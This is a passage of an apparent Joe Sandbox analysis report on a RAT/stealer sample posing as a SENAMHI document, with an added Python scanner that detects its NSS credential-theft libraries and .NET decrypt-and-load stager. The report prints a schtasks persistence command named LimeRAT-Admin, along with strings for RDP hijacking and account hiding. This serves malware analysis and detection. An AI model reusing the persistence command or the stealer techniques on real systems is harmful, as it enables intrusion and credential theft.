Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80765987792.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80760169574.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768273960.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr
Source: Binary string: wuser32.pdbUGP source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83509823788.000000000515F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83511925092.0000000005570000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80756890980.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80741387008.0000000006411000.00000004.00000800.00020000.00000000.sdmp
Source: DocumentoSENAMHI20222103.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: DocumentoSENAMHI20222103.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: DocumentoSENAMHI20222103.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: DocumentoSENAMHI20222103.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: DocumentoSENAMHI20222103.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
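The SQLite statements and PDB paths listed above come from a known set of libraries: softokn3, nss3, freebl3 and mozglue are Mozilla NSS (the obj-thunderbird build path in the PDB strings gives them away), sqlite3 is the database engine underneath them, and the metaData INSERT string found in softokn3.dll is the key4.db table in which NSS keeps its password-check entry. A credential stealer drops these beside itself to read Firefox/Thunderbird password stores, which fits the AveMaria detection in this report. The CreateDecryptor/TransformFinalBlock hits, together with the AppDomain::Load(System.Byte[]) references under Data Obfuscation, are the decrypt-then-load pattern of a .NET stager. The following Python is an added example, not part of the Joe Sandbox report or of the sample's code: it scans a byte buffer (a dropped file or a process memory dump) for those two indicator sets and reports which sets fire. The per-set thresholds, the NUL-bounded matching of #Strings heap names and the three sample buffers are constructions for this example, not values taken from the report.

```python
"""Indicator scan for the string artefacts listed in this report.

Added example, not part of the Joe Sandbox report or of the sample: scans a
byte buffer (a dropped file or a process memory dump) for two indicator sets
and reports which sets fire. Thresholds, the NUL-bounded matching of .NET
#Strings heap names, and the sample buffers are constructions for this example.
"""
from __future__ import annotations

from dataclasses import dataclass


@dataclass(frozen=True)
class IndicatorSet:
    name: str
    patterns: tuple[bytes, ...]
    min_hits: int  # distinct patterns that must be present before the set fires


# Set 1: the Mozilla NSS / SQLite libraries a stealer drops beside itself to read
# Firefox/Thunderbird password stores. PDB path fragments and SQL statements are
# copied from the report's "Binary string" and "Binary or memory string" entries;
# vcruntime140/msvcp140 are left out because benign software ships them too.
NSS_SQLITE_TOOLKIT = IndicatorSet(
    "nss_sqlite_credential_toolkit",
    (
        b"softoken_softokn3\\softokn3.pdb",
        b"obj-thunderbird\\security\\nss3.pdb",
        b"freebl_freebl3\\freebl3.pdb",
        b"mozglue\\build\\mozglue.pdb",
        b"sqlite\\Release\\sqlite3.pdb",
        b"INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);",
        b"CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);",
    ),
    min_hits=2,
)

# Set 2: the .NET stager pattern (CreateDecryptor + TransformFinalBlock on an
# embedded blob, then AppDomain::Load(byte[])). In a CLR image these names sit in
# the #Strings metadata heap as NUL-terminated UTF-8, so each one is anchored with
# a NUL on both sides (assumption: the input is the raw image, not a decompiled
# listing), which keeps "Load" from matching inside ordinary text.
DOTNET_REFLECTIVE_LOADER = IndicatorSet(
    "dotnet_reflective_loader",
    (
        b"\x00AppDomain\x00",
        b"\x00Load\x00",
        b"\x00CreateDecryptor\x00",
        b"\x00TransformFinalBlock\x00",
    ),
    min_hits=4,
)

INDICATOR_SETS = (NSS_SQLITE_TOOLKIT, DOTNET_REFLECTIVE_LOADER)


def scan(blob: bytes) -> dict[str, list[bytes]]:
    """Return {set name: matched patterns} for every set whose threshold is met."""
    fired: dict[str, list[bytes]] = {}
    for ind in INDICATOR_SETS:
        hits = [p for p in ind.patterns if p in blob]
        if len(hits) >= ind.min_hits:
            fired[ind.name] = hits
    return fired


def triage(samples: dict[str, bytes]) -> dict[str, list[str]]:
    """Map each sample name to the indicator sets it triggers (empty list = clean)."""
    return {name: sorted(scan(blob)) for name, blob in samples.items()}


# Constructed inputs, not bytes from the real files: a softokn3-like image, a
# #Strings heap as a .NET stager would carry it, and a benign buffer that
# contains the word "Load" without NUL boundaries.
SAMPLE_SOFTOKN = (
    b"MZ\x90\x00" + b"\x00" * 16
    + b"z:\\task_1538344561\\build\\src\\obj-thunderbird\\security\\nss\\lib\\softoken\\softoken_softokn3\\softokn3.pdb\x00"
    + b"INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);\x00"
)
SAMPLE_DOTNET_STRINGS = (
    b"\x00<Module>\x00AppDomain\x00Load\x00CreateDecryptor\x00TransformFinalBlock\x00"
    b"System.Reflection\x00Assembly\x00"
)
SAMPLE_BENIGN = b"MZ" + b"Load the document and transform it.\x00" * 4

if __name__ == "__main__":
    for name, sets in triage({"softokn3.dll": SAMPLE_SOFTOKN,
                              "stager.exe": SAMPLE_DOTNET_STRINGS,
                              "benign.exe": SAMPLE_BENIGN}).items():
        print(f"{name}: {', '.join(sets) or 'no indicator set fired'}")
```

Feed it the dropped softokn3.dll and the unpacked .NET images the report lists (the 15.0.wtqsCpda..exe.540000.*.unpack dumps, for instance) as open(path, "rb").read(); the benign buffer is there to show why the .NET names are matched with NUL boundaries rather than as plain substrings, and the threshold of two for the NSS set means a lone sqlite3.pdb in an ordinary application does not fire it.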

Data Obfuscation

Source: Chrome[1].exe.1.dr, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: wtqsCpda..exe.1.dr, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: chrome.exe.15.dr, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 15.0.wtqsCpda..exe.540000.3.unpack, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 15.0.wtqsCpda..exe.540000.2.unpack, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 15.0.wtqsCpda..exe.540000.1.unpack, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 15.0.wtqsCpda..exe.540000.0.unpack, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 15.2.wtqsCpda..exe.540000.0.unpack, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 18.2.chrome.exe.760000.0.unpack, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 18.0.chrome.exe.760000.0.unpack, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 19.0.chrome.exe.a20000.0.unpack, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 19.2.chrome.exe.a20000.0.unpack, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 19.0.chrome.exe.a20000.1.unpack, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 19.0.chrome.exe.a20000.2.unpack, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 19.0.chrome.exe.a20000.3.unpack, ?????????/???????????.cs .Net Code: ????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BE01B1 push ecx; ret 1_2_00BE01C4
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Code function: 15_2_00544C79 push ss; ret 15_2_00544C7E
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Code function: 15_2_0293F1F8 push esp; ret 15_2_0293F1F9
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Code function: 15_2_0293F99C push 0000003Bh; ret 15_2_0293F9AF
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Code function: 15_2_0293F9D5 push 0000003Bh; ret 15_2_0293F9DD
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 18_2_00764C79 push ss; ret 18_2_00764C7E
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 19_2_00A24C79 push ss; ret 19_2_00A24C7E
Source: msvcp140.dll.1.dr Static PE information: section name: .didat
Source: mozglue.dll.1.dr Static PE information: section name: .didat
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe File created: C:\Users\user\AppData\Local\Temp\chrome.exe Jump to dropped file
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe File created: C:\Users\user\AppData\Local\Temp\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe File created: C:\Users\user\AppData\Local\Temp\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe File created: C:\Users\user\AppData\Local\Temp\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe File created: C:\Users\user\AppData\Local\Temp\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe File created: C:\Users\user\AppData\Roaming\wtqsCpda..exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chrome.exe File created: C:\Users\user\AppData\Local\Temp\IconLib.dll Jump to dropped file
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe File created: C:\Users\user\AppData\Local\Temp\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe File created: C:\Users\user\AppData\Local\Temp\msvcp140.dll Jump to dropped file

Boot Survival

Source: Yara match File source: 15.0.wtqsCpda..exe.540000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.chrome.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.chrome.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.wtqsCpda..exe.2b22c9c.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.chrome.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.wtqsCpda..exe.2b22c9c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000000.80248070314.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.80097480691.0000000000762000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.80087663971.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.83499752484.0000000000762000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.80247515540.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.80088120152.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79892756744.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79892233843.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.80404784517.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.80246486829.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79893250831.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.80311999722.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.80246995488.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79893776213.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.80316124713.0000000002B22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wtqsCpda..exe PID: 1033924, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: schtasks.exe PID: 1034124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: chrome.exe PID: 1034204, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: chrome.exe PID: 6672, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\wtqsCpda..exe, type: DROPPED
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\user\AppData\Local\Temp\chrome.exe'"

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe File opened: C:\Users\user\AppData\Local\Temp\chrome.exe:Zone.Identifier read attributes | delete
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: 15.0.wtqsCpda..exe.540000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.0.unpack, type: UNPACKEDPE
